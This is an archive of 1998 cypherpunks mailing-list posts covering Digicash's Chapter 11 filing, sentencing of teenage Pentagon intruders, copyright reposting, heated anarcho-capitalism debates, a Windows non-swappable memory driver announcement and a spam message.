With the announcement last week that it filed for Chapter 11 bankruptcy
protection, Digicash has embarked on yet another phase of a corporate
saga that has won it acclaim and admiration in both the banking and
Internet communities -- but precious little business.

Shielded for the moment from creditor pressures, the Palo Alto, Calif.,
company will attempt to find the financing and forge the strategic
relationships it needs to widen the appeal of its eCash product, said
interim chief executive officer Scott Loftesness.

The company also has a significant "intellectual property portfolio," he
said, that could prove useful in other applications requiring privacy
and anonymity, such as electronic voting.

Mr. Loftesness indicated that Digicash has never exploited the full
potential of its patents to generate licensing income, which now might
help turn the operation around.

Bankruptcy is but the latest of many turns for an eight-year-old venture
created by David Chaum, a former University of California professor and
expert on data encryption who was among the first to see a need for a
cash-like payment mechanism on open networks. The design of eCash and
its anonymity principles attracted widespread attention in 1994 and 1995
as banks and other corporations began exploring the Internet's
commercial potential.

Through a series of consulting projects and demonstrations, Digicash
came close to assembling a network of banks to issue and manage the
virtual currency. But the licensee group -- including Deutsche Bank, Den
Norske Bank, Bank Austria, Advance Bank of Australia, and Mark Twain
Bank of St. Louis -- never got beyond pilot stages.

Things were looking up in 1997 when Digicash attracted venture capital
interest from, among others, David Marquardt of August Capital, who was
an early backer of Microsoft Corp.

Digicash also reconstituted its board with Massachusetts Institute of
Technology professor Nicholas Negroponte as chairman, and hired
"professional management" led by CEO Michael Nash, a former American
Express Co. and Visa International executive. Mr. Chaum remained as
chief technology officer.

The headquarters was moved from Mr. Chaum's base in Amsterdam to Silicon
Valley. Many in the banking technology world took positive note of the
fact that in June 1998, former Wells Fargo & Co. president William
Zuendt joined Mr. Negroponte, Mr. Marquardt, Mr. Chaum, Toon den Heijer
of Gilde Investment Funds, and others on the board.

This past August, Mr. Nash was succeeded by Mr. Loftesness, who also has
Visa in his background. The part of the operation that remained in
Amsterdam was closed, and the staff was cut significantly from its peak
of about 50.

Mr. Loftesness said last week that he intends to see the Chapter 11
process through. He described eCash as "important and inevitable" for
the maturity of electronic commerce.

Throughout its struggles to prove it was not too far ahead of its time,
Digicash has been followed closely by analysts and treated seriously by
competitors. Many were impressed by the technology's cash-like anonymity
and an accountability system that prevents any of the virtual coins from
being spent twice, yet without compromising personal privacy.

"There is a great lesson in it," said Richard Crone, vice president of
Cybercash Inc. and general manager of PayNow, its version of an
electronic check. "You must match the payment type to the application
that is being sold."

He called Digicash "a payment type in search of an application, rather
than an application in search of a payment."

So far in Internet consumer payments, particularly in the United States,
credit cards have won the day. "We've done such a good job deploying
credit cards and reassuring consumers that the security is present," Mr.
Crone said, that there is no compelling need for eCash. (Cybercash's
cybercoin product ran up against the same reality, but the Reston, Va.,
company is active in several payment modes, including credit cards.)

Cybercash's inroads in markets outside the United States with lower
credit card penetration -- Germany, Japan, the United Kingdom -- were
due to financial institution partners, Mr. Crone said. "Digicash did not
have the support we did."

David Stewart, vice president of Global Concepts Inc., Norcross, Ga.,
criticized Digicash for not bridging the physical and virtual worlds. He
said as currently configured, eCash compares unfavorably with MasterCard
International's Mondex venture, the Belgium-based Proton system, or
Avant of Finland, which are smart cards with an Internet transmission
component.

Because eCash "needed on-line validation of tokens spent, clearing of
the transactions required authorization like a credit card," Mr. Stewart
said.

Another strike against eCash, he said, was the lack of major financial
institution support in the United States, where there are constituencies
for Mondex, Visa International's Visa Cash, and Proton, which is
part-owned by Visa and American Express Co.

"Digicash needs to come up with an off-line electronic cash scheme and
have the backing of a serious player in the payments world," Mr. Stewart
said.

The one U.S. participant, Mark Twain Bank, was acquired by Mercantile
Bancorp. of St. Louis 20 months ago. Larry Kirschner, Mercantile Bank
senior vice president of foreign exchange, said eCash "was not
profitable from the moment we inherited it.

"We tried to figure out how to make it profitable and for it to appeal
to our corporate and retail customers, to very little success," he said.
The bank ended its three-year experiment in September.

It had 5,000 eCash customers, about 20% of them in Mercantile's
eight-state Midwest territory and the rest on the two coasts. They held
"significantly less" than $100,000 in eCash accounts, Mr. Kirschner
said.

"We didn't see a strategic fit for eCash," he said. "The revenue stream
was not there, the demand was not there, and quite frankly, it wasn't
going to be there."

The banker said eCash suffered because the public "did not have any
insecurity and did use their credit cards on the Internet."

But Mr. Loftesness said Digicash's board and backers have not lost faith
that "eCash is inevitable. The length of time and the amount of
financing to get there remain the key open questions."

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Nov 1998 23:19:45 +0800
To: cypherpunks@cyberpass.net
Subject: Usual Computer Ban
Message-ID: <199811101453.JAA28698@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



>Pentagon Kids Kicked Off Grid 
>Reuters
>
>11:47 a.m.  6.Nov.98.PST Two California teenagers who mounted what the
Pentagon >called one the most systematic attacks ever made against a US
military computer >network were sentenced by a federal judge Thursday.
>
>US District Judge Maxine Chesney doled out the usual punishment for those
convicted >of computer crimes: No more computers. The boys, aged 16 and 17,
are barred from >using modems or computers without supervision during their
three-year probation.
>
>The judge forbade the hackers from possessing or using a computer modem,
acting as >computer consultants, or having any contact with computers out
of sight of "a school >teacher, librarian, employer, or other person
approved by the probation officer."

Usual laugh.  Not technically feasible to mount this sort of Denial of
Service attack unless you actually imprison them.

Computers and connections are a bit too ubiquitous.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 10 Nov 1998 23:29:56 +0800
To: cypherpunks@cyberpass.net
Subject: Re: fuck copyright (Re: Advertising Creepiness) (fwd)
In-Reply-To: <199811100539.XAA16120@einstein.ssz.com>
Message-ID: <v04020a20b26e04e5e1e5@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:24 AM -0500 on 11/10/98, Frank O'Dwyer wrote:
> There's even some research on attacks
> that simply delay packets in such networks.

Right. In the movie "The Sting", they called this con "The Wire".

:-).

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 10 Nov 1998 23:53:58 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Guy, anti-copyright hacker (Re: Advertising Creepiness)
Message-ID: <199811101523.KAA05690@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: Adam Back <aba@dcs.ex.ac.uk>
   >
   >   Information Security <guy@panix.com> writes:
   >   > Declan writes:
   >   > >   Willfully redistributing copyrighted material in violation of fair
   >   > >   use principles is, depending on the value, also a federal
   >   > >   crime. Redistributing a $1 article to thousands of people would be
   >   > >   a felony. (Note I don't endorse this law, but it's useful to know
   >   > >   what the law is.)
   >   > 
   >   > I guess that qualifies as a request for more color.
   >   > 
   >   > In the local Panix Usenet groups, I've reposted quite a few whole articles,
   >   > often from the IP list.
   >   > 
   >   > Finally, a couple people made a stink, and officially complained to Panix.
   >   > 
   >   > [snip panix owner backing down and not interfering with Guy's posts of 
   >   >  whole supposedly copyrighted material]
   >
   >   Nice one Guy!
   >
   >   The zen approach, it reminds me of a tactic to do with USENET cancel
   >   forgeries used by a recentish poster to this list who you made much
   >   a-do about being a terminator of.

Ugh, um, ...but he was a nutter, unlike me. ;-)

The other half of the reason I chose the IP list is because
of my dislike of its owner, nutter Michele Moore.

She is trying to profit from a book claiming various government agencies
knew full well the OK Murrah building was going to be blown up, and
purposely did nothing. Trying to profit from other's misery.

(At least my nutter anti-ECHELON "Cryptography Manifesto" is free.)

She also terminated my list subscription when I made a single post
asking for people not to make homophobic posts. She was 100% unforgiving
on this, even though I promised not to make such a post again. She
described the homophobic posts as "Christian". (This was around the time
Pat Robertson made comments about Florida's Disney being hit by God with
hurricanes because of its "gay days" promotion.)

It's also a very high-volume list, and I recently asked her about
posting about car antennas...

#   From believer@telepath.com Fri Oct 30 06:47:36 1998
#   To: Information Security <guy@panix.com>
#   Subject: Re: IP: New Radio Antennas May Cool Car Interior, Defrost Car Windows
#   
#   Dear Guy:
#   
#   Regarding:
#   >What does this have to do with IP's charter?
#   >---guy
#   
#   Once again, as you are a non-subscriber receiving posts by forwarding
#   (which is fine), it's none of your business.  Enjoy the posts that you
#   receive, feel free to forward them wherever you wish, but please do not
#   contact me again for any reason.

Bitch.

   >   > Then, the Digital Copyright Massive Federal Interference Act...
   >   > 
   >   > >   Fair Use vs. Intellectual Property: The U.S. Congress
   >   > >   passed the Digital Millenium Copyright Act, a bill designed to
   >   > >   distinguish between fair use and protected intellectual property
   >   > >   in cyberspace.
   >   > >   
   >   > >        <http://thomas.loc.gov/cgi-bin/bdquery/z?d105:s.01146:>
   >   > 
   >   > I chose the IP list as the next-level test case...
   >
   >   I'm curious ... how have you faired since the millenium copyright act
   >   with panix?  Any results?  Or is this still on-going?

I've been snipping down articles a bit since then.

As far as I know, no one has complained about my posts
relative to the new law.
---guy




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 01:04:46 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: How to solve the tax problem w/o anarchy or force (fwd)
Message-ID: <199811101623.KAA18748@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 10:28:10 -0500
> From: Soren <sorens@workmail.com>
> Subject: Re: How to solve the tax problem w/o anarchy or force (fwd)

> I used to be an anarcho-capitalist, but concluded I was far too selfish. In fact, if
> you'd read the first line about the libertarian compromize, rather than looking for
> hooks, you'd see that I was attempting rapprochement.  Mostly I'm not at all
> interested in being drawn into political wastings of energy, life is too short.  I
> made my choice 25 years ago, and have been (largely) free and untaxed for that time.
> Harry Browne's "How I found freedom in an unfree world" came along at about the same
> time I cut loose from the nation-state.

You're speaking of federal taxes, or you don't own property in your own
name. I suppose you wouldn't call the fire dept. if your house caught on
fire since you don't pay taxes. You wouldn't call the police if there was a
problem either.

> Why the pejorative use of "anarcho-whatever" and the whole personal level at which you
> pitch your responses?  Is it your intent to stir up anger by using imflammatory
> rhetoric?

No, my intent in wording is to get at the core of what is being proposed. A
characteristic of anarcho-whatever and lawyers is they never say what they
mean. If they did very few would give them the attention they get now.

>  Or (more likely) is this an example of newspeak? Whatever, it comes across
> as mean-spirited and sad. An indicator perhaps, of someone who loves to "go for the
> jugular".  A common "small man" trait. Are you a small man Jim? Do you need the power
> of the state to make you feel big by proxy?

IROFL.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Tue, 10 Nov 1998 22:54:37 +0800
To: cypherpunks@cyberpass.net
Subject: Re: How to solve the tax problem w/o anarchy or force (fwd)
In-Reply-To: <199811101323.HAA17131@einstein.ssz.com>
Message-ID: <36485B8A.B183694F@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:

> > <P>This also provides an outlet for the social do-gooders to create their
> > utopias by vastly inflating those taxes associated with less favored consumables
>
> Hm, interesting choice of terms for comparison. So you're admitting that
> anarcho-whatever isn't a social do-gooder, the intent is not to make the
> system better or more equitable. Rather you're admitting, apparently
> tacitly, that the goal of the anarcho-whatever is personal rather than
> social improvement. There is also a further tacit admission with this
> system won't address the social ills that plague us currently.
>

I used to be an anarcho-capitalist, but concluded I was far too selfish. In fact, if
you'd read the first line about the libertarian compromize, rather than looking for
hooks, you'd see that I was attempting rapprochement.  Mostly I'm not at all
interested in being drawn into political wastings of energy, life is too short.  I
made my choice 25 years ago, and have been (largely) free and untaxed for that time.
Harry Browne's "How I found freedom in an unfree world" came along at about the same
time I cut loose from the nation-state.

Why the pejorative use of "anarcho-whatever" and the whole personal level at which you
pitch your responses?  Is it your intent to stir up anger by using imflammatory
rhetoric?  Or (more likely) is this an example of newspeak? Whatever, it comes across
as mean-spirited and sad. An indicator perhaps, of someone who loves to "go for the
jugular".  A common "small man" trait. Are you a small man Jim? Do you need the power
of the state to make you feel big by proxy?

One thing the anarcho-capitalist rants all contain, is frustration at being under the
thumb of authority.  They believe that outlawing big thumbs will fix this.  Until that
happy day (should it ever occur), I have perceived that big thumbs are very clumsy. I
prefer to move rapidly enough that they have difficulty in pinning me down, numbering
me, punching and spindling me.  My domiciles tend to be in nation-states that provide
safe havens to those who have stuff that the big thumbs would like to expropriate. I
visited and left the US at about the time the streets paved with gold turned to the
streets paved with goldbrickers.

Some of the socialist propaganda leaked out in your posting.  Why would I be concerned
about curing "social ills"?  I'm fully tied up in interacting with my own little
society -- my parents, siblings, children, friends, pets, possessions.  Why would I
need or desire any other (arbitrary) social connections?  I don't have your missionary
zeal I suppose. All such change that I could effect would be as nothing, seen from the
perspective of 100 years in the future. I'd hate to be branded as a 'deadbeat dad' by
my nakama because I was paying more attention to righting abstract wrongs, than
reading to my children. Pillory Klinton was almost correct; it does take a village, or
buggering off to live in one and leaving the neo-roman empiricists to prop up their
ailing support system without me.

If you are more concerned about addressing social ills than your personal life, I feel
sorry for you.  If you want to make a contribution to the social ills I have
accumulated however, I'll send you my numbered account details and you can deposit
directly.

> > <P>Last time I looked at it, there were 108 separate taxes included in
> > the retail cost of an egg and 112 for a loaf of bread, so yes, I would
>
> I'd like a reference to this particular list if possible.

Go find it yourself.  I'm not a charitable or state institution.  Here's a hint though
-- Ralph Nader, comsumer watchdogs.

>
>
> > <P>One question for the socialists out there;&nbsp; when is the promised
> > egalitarian utopia&nbsp; going to kick in?&nbsp; It doesn't seem to be
> > getting any closer.</HTML>
>
> I'd ask the same question of the anarcho-whatever but you took care of it so
> adroitely above...
>

Very good point. I take it as reinforcing the correctness of my decision to opt-out.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 11 Nov 1998 01:20:30 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the (fwd)
Message-ID: <199811101638.KAA18839@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 11 Nov 1998 01:25:02 +1000
> From: Reeza! <howree@cable.navy.mil>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the
>   Foregone (fwd)

> I think there may be a finer distiction- it lies in corruption of the
> enforcing body.

Your right, let me spell it out. Free-markets as depicted by
anarcho-whatever theories legitimize theft, physical violence, extortion,
etc. They further a priori abandon any precept of social institution and
leave it all on the shoulder of the individuals. Additionaly they abandon
such concepts of justice, equity, etc. because they describe no mechanism
to handle these issues. And finaly, they don't even attempt to recognize
the international interactions and cultural differences that drive them.

They make the same mistake as every other form of non-democratic system,
they assume because it works for one it works for all.

> This is the same sort of tactic imho as the war on drugs(tm). Big show,
> little enforcement, extract money from the money holders. Money exchanges =
> leniency.

Not even hardly. At least citizens can change the laws under a democracy.
Under an anarcho-whatever it is strictly lump it or like it unless you're
willing to fund a bigger gun.

> Aside from the comment on honesty, the rest of this reply is sophistry.
> Petro was asserting a point, which Jim acknowledged, then procedes to
> assassinate with particulars of questionable relevance. In a true anarchy,
> who is to say that trade in human lives and stolen property must be stopped
> in that "true free market"???

Ask the humans who are being traided or the peson the property was stolen
from.

I'm going to stop now, this particular vein of discussion is bereft of any
and all positive attributes when one tries to justify slavery and theft.

Like I said, at least your more honest than the rest of these wanna-be
thieves.

You might want to see doctor about that hole you shot in your foot while
it was in your mouth.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 11 Nov 1998 01:40:00 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <199811100252.UAA15446@einstein.ssz.com>
Message-ID: <v04011714b26dfec21708@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:52 PM -0500 11/9/98, Jim Choate wrote:
>Forwarded message:
>> 	Usualy !=3D Correctly.
>> 	Take tomatoes. Perfectly legal (AFAIK) everywhere, here in this
>> country a 5 year old child can buy a tomato from a farmer with a stand on
>> the side of the road.
>> 	If you go back 10 years, and if "this country" was the soviet
>> union, a tomato purchased from the wrong person could get you in trouble.
>So what are saying...that because any government ever happened to abuse its
>citizens in a particular way is justification to do away with all
>government?

	No, I am saying that since EVERY government at one time or another
treats its citizens like roaches, it's time to radically change the nature
of it so that it basically can't be called a government any more.

>> 	This is true in this coutry. Licquor is legal if purchased thru the
>> approved store.
>>
>> 	Try selling the same thing out of the back of your truck.
>>
>> 	It is the product, or how the product is sold.
>
>Well actualy it's whether it has a tax stamp whether you sell it out of a
>storefront or a truckbed is irrelevent. Considering the number of people who

	Wanna bet?

	Most states have fairly strict laws concerning where liquor can be
sold.

>died in the late 1800's and early 1900's because of moonshine liquor from
>contaminated stills that were unregulated (where were those fine upstanding
>ethical considerate eco-anarchists then?) it's probably a good thing that
>it's illegal to sell untaxed and therefore anonymous alcohol.

	Which is completely irrelevant as to wheter or not it is currently
black market or not, which is the context I was working in.

	Stay on target.

>> 	So take ampthetimines (well, don't take them, but take the case of
>> them), if I get them from Joe Random Drug Dealer, it's black Market, if I
>> get them from Paul the Doctor, it's "white" market.
>
>Not necessarily. The doctor has to have a medicaly supportable reason to
>dispence those drugs. Otherwise it's just as black market as Joe's.

	Quibble Quibble. You know EXACTLY what I meant.

>> 	I didn't think of theft when I wrote the above, and I don't usually
>
>Didn't think of theft? Jesus H. Christ, you gotta be on Joe's drugs. The
>vast majority of material sold on *ANY* black market is stolen from its
>rightful owner. It is *the* example of black market trading that most folks
>think of first.

	No, the vast majority (in terms of dollars) of stuff sold on the
black market is Drugs.

>> 	I still maintain that as one moves closer to a completely free
>> market, there is less and less of a black market, and to be the extrememe
>> case of a free market, there would be the potential to trade in both human
>> lives, and in stolen property.
>
>Well, at least you're an honest eco-anarchist. And how do you propose to stop
>this sort of behaviour (it's clear that there is a market whether the
>economy is free-market or not) without some sort of 3rd party arbiter (call
>it government or not is irrelevant to the point)?

	Treat theft like any other economic activity, and figure out how to
make it unprofitable.


>> In a free market, the selling of stolen
>> goods might not be a crime in and of itself, but the posession of those
>> things could be,
>
>How the hell do you sell something on the black market if you don't have
>possession of it? And exactly who is going to prosecute anyone for

	Easy, it's called a Con.

	Seriously tho, I said that the _selling_ of stolen goods might not
be illegal, but the possesion of such things, and the stealing of them are
seperate acts to the selling of them.

	One can be illegal with out the others being illegal.

>possession? Since we've done away with laws governing economics and trade
>there isn't even a court to try the perps in if we did apprehend them
>ourselves.

	There isn't a need to. Shoot them.

	Also, a negligably regulated market doesn't necessarily mean that
there are no laws, there are many, many activities that are proscribed by
law which have little or nothing to do with economics.

> and the aquireing would be, as well, the _hiring_ of an
>> assassin might be legal, as long as no killing took place. When it does,
>> you hang the assassin on murder, and the hirer on conspiracy, aiding and
>> abetting or whatever, and stick them in the same cell.
>
>Huh? Who is doing all this arresting and writing of laws, and building
>jails, and staffing prisons, or hiring hangmen?

	Good point, guess we'll either have to kill them outright, or start
cutting off fingers.

--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Wed, 11 Nov 1998 01:49:32 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <199811100403.WAA15755@einstein.ssz.com>
Message-ID: <v04011715b26e0dd7a1d3@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:03 PM -0500 11/9/98, Jim Choate wrote:
>Forwarded message:
>> 	Prove it. Prove that in a competitive market certain goods and
>> services will be MORE expensive than in a Government-as-Supplier.
>
>Ok. Let's use the example of fire stations and insurance companies that came
>up earlier.
>
>What do you suppose the impact on the bottem line will be by increasing the
>amount of non-income-producing-services that such a situation would require?
>Each insurance company would be responsible for many, many stations

	Really, you are saying they couldn't possibly recognize the
benefits of teaming up and co-locating fire stations, or that they wouldn't
sub-contract to a company that handled fires?

>scattered all over the country. This means some sort of centralized
>mechanism to create policies and other procedures and their requisite costs.
>Now, consider what that means to the payment each policy holder is going to
>have to deal with. It's going to be large because it's going to have to take
>up for parts of the company that don't bring in policy income but still
>require service coverage.

	This could still be more effcient than government.

>Now by distributing this system out and assigning it to governments and
>providing equitable service to all, no questions asked they're there we, we
>get a system that is reasonable in cost and provides good responce.

	"reasonable" in cost? There is a LOT if inefficiency in the system
that competition could eliminate.

>> 	How many Corporations you know buy $300 hammers, or $1000 toilet
>> seats?
>
>Lot's of them throw good money after bad. All businesses do. It's human
>nature. I know of one company that got so carried away with spending for
>little dribbles and drips that they ended up having to stop hiring new
>employees that the company desperately needs. I used to work for one,
>Compu-Add, that led to its final demise.

	Read that last bit. They got so carried away, that they spent
themselves out of existence.

	Governments just raise taxes, there is no penalty for ineffcientcy,
or lousy spelling.

>> >capitalist shouldn't begrudge a tidy profit anyone under any situation.
>> 	I don't begrudge a profit where it's due. Bill Clinton isn't due.
>> Neither is Newt Gingrinch, or any other Feeding at the government trough
>> pig.
>Agreed. But the solution is term limits on Congress-critters and a
>re-vamping of some critical laws.

	Ok, so you limit the senators and congressmen, then the unelected
beaureacrats have the power since they know the system and run the system.

>> 	No, the problem is the police. To quote (IIRC) Lydia Lunch:
>>
>> 	"Neo Nazis with night stick dicks, no brains but banging into yours
>> in the middle of the night looking for whatever don't fit in with their
>> ideologically unsound version of reality".
>
>Well I happen to come from that sub-culture so I can speak from experience.
>The majority of times I or my friends were hassled we were asking for it.

	Well, coming from that subculture, and living in areas that allowed
me to observer others, I'd say bullshit.

	Wearing a painted leather jacket & ripped up blue jeans is NOT a
reason to get hauled off the street, searched and questioned.

	Looking different is not illegal.

	Thinking different is not illegal.

>> >That process *is* most certainly an ideal place to inject consideration and
>> >respect for civil liberties and the purvue of government institutions.
>> 	Oh, and that has been working OH SO WELL thus far.
>No, and that's my point.

>> 	No I don't. but check the numbers, there is a $6000 LESS collected
>> in road taxes (average) PER CAR for each car in america. That $6k comes out
>> of my pockets as well,
>
>How the hell do you figure that one? It may come out of YOUR state taxes but
>it certainly doesn't come out of mine (I don't have state taxes). The funds
>for road and such is collected solely through gasoline and auto related
>sales taxes in Texas.

	With a bunch thrown in at the federal level. Federal Matching Funds
& etc.

>Perhaps you should fix your state government...

	Federal, State, County, and City.

>Now if you're talking about the federal taxes for roads, that has NOTHING to
>do with your or my driving vehicles on those roads. It has to do with a
>program implimented in the early 20th century to create a good road net in
>the US for military use. The taxes are justified in principle, if not in
>amount, through commen defense.

	Then why do they keep building them?

>> 	If that is the interpretation, then the document is morally flawed.
>Interpeted?
>We, the People of the United States, in order to form a more perfect Union,
>establish Justice, insure domestic Tranquility, provide for the common
>defence, promote the general Welfare, and secure the Blessings of Liberty to
>ourselves and our Posterity do ordain and establish this Constitution for the
>United States of America.

	Promote != provide.

	Promote does not mean "give away", it means "promote", do things
which incourage.


>> 	How many died at the hands of Stalin, Hitler. and other dictators?
>
>A lot more than at the hand of honest people, which is my point as well.
>These were people, not governments. The citizens willingness to participate
>aided and abetted each and every one of them and weakens your use of them in
>your defence.

	They were the heads of the governments. The skills and abilities it
takes to get to that level insure that the people who get there have no
concern for those underneath them.

>> 	The state, whether here in the US, or in other countries tends to
>> treat the humans that comprise it with little concern for their health or
>> livelyhood,

>Yep, I see lots of that every day. In one hand you complain about welfare
>and then in the other claim that the state is uncaring. Can you please make
>up your mind?

	There is no making up my mind. I never claimed the a government
could or should, rather I am claiming that it can't and won't, and to
expect it to be able to, much less willing to is foolish.

>> 	If you have citizens that are honest, principled, and willing to
>> assist those around them, you have no need for a "state".
>If your process relies on this it's doomed from the get go. This ain't
>Vulcan.

	So we agree that any government is doomed from the start, since
w/out people of honesty and integrity no system will work properly.

>> 	Without honesty and principles you have Slick Willy.

>And Bubba next door as well as that face that stares out at you every
>morning.

	No, that face that stares back from the mirror makes every effort
to be as honest and forthright as it can. It causes grief sometimes, but
it's the principle.

>> 	There are 1.7 million people struck by lightning every year?
>There aren't 1.7M poeple killed in the US by the LEA's. That would be about
>1-in-150. There are several hundred people killed by lightening each year in
>the US. The number of people killed in activity complicent with LEA's is
>probably not a great deal (at most an order of magnitude) over that.

	That 1.7 million is the estimated people who have been killed this
century (170 million) in wars and murdered by governments divided by the
number of years in a century (100) which would give 1.7 million, or is my
math getting that bad?

	I don't see why I should limit my comments on the nature of
government to what I see in this country as there is a wealth of other
experience outside our borders.



--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Albert P. Franco, II" <apf2@apf2.com>
Date: Tue, 10 Nov 1998 19:22:37 +0800
To: Michael Hohensee <mah248@nyu.edu>
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <5F152E6E8E6FD21195DF00104B2425AD02B276@yarrowbay.chaffeyhomes.com>
Message-ID: <3.0.3.32.19981110111844.0093ad40@apf2.com>
MIME-Version: 1.0
Content-Type: text/plain



I've been lurking on this thread for a while, and I am amazed by the level
of utopist muck that is being spewed here by you. 

Without some government the Bad Guys will be the only ones with anything.
It is only with the threat of losing their power that leaders do good. If
they had no power which could be lost or taken they will always do what's
best for them in the short term, which is usually to shit on the peons.
Dictators (like Pinochet and Gates) do their dirty deeds because they feel
no need to placate the masses. 

This anarcho-capitalist spew is so much crap that the bullshit indicators
are blaring at top volume. If the people can't control a constitutional
government, known for having peacefully free elections for over two hundred
years, then how the hell do think you can convince somebody that the people
are going to be able to control warlords and monopolies. It's called, "You
don't like it? Bang, Bang, you're dead!" 

Try to lift yourself out of the bullshit of your theory and give us at
least one REAL example (current or historic) of a large scale, long lasting
anarcho-capitalist society. Hippie communes are too small, and make sure
it's capitalistic. If you can't think of one in the next year or so then
come back and tell us.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jim Adler" <jadler@soundcode.com>
Date: Wed, 11 Nov 1998 04:23:09 +0800
To: <cypherpunks@toad.com>
Subject: Locking physical memory (RAM) under Windows
Message-ID: <001201be0cdf$9a045c90$0a000080@choochoo>
MIME-Version: 1.0
Content-Type: text/plain



SCNSM 1.0 Beta, a non-swappable memory allocator for Windows 3.x/95/98, is
available and can be downloaded from

http://soundcode.com/content/download/products/scnsm/default.htm (docs)
http://soundcode.com/content/download/products/scnsm/scnsm10b.zip (source)

The SCNSM driver supports allocation of non-swappable memory on Windows
3.x/95/98. The principal design goal of SCNSM is to provide memory that will
not be swapped to disk, under any circumstances. Typically, security
applications require such memory to store private keys, passwords, and
sensitive intermediate results of cryptographic calculations.

SCNSM uses the same technique as allocating DMA buffers for hardware device
transfers.  The idea being that Windows doesn't swap DMA buffers and
therefore won't swap this buffer either.

The SCNSM source-code is copyrighted freeware.  The intent here is to end
the perennial nuisance of having sensitive security data swapped to disk
which undermines the public's confidence in commercial security products.
Please send any questions or bugs to me or support@soundcode.com.

Jim

================
Jim Adler
Soundcode, Inc.
www.soundcode.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: poc@searchengine-secrets.com
Date: Wed, 11 Nov 1998 10:08:31 +0800
To: <cypherpunks@toad.com>
Subject: Your Web Site location
Message-ID: <199811110137.RAA10828@toad.com>
MIME-Version: 1.0
Content-Type: text/plain




Would you like to improve your web site's position on
the Search Engines?

Over the past two years we've been acknowledged by Internet
Experts as the definitive source for information on how to obtain
top placement on the major search engines.

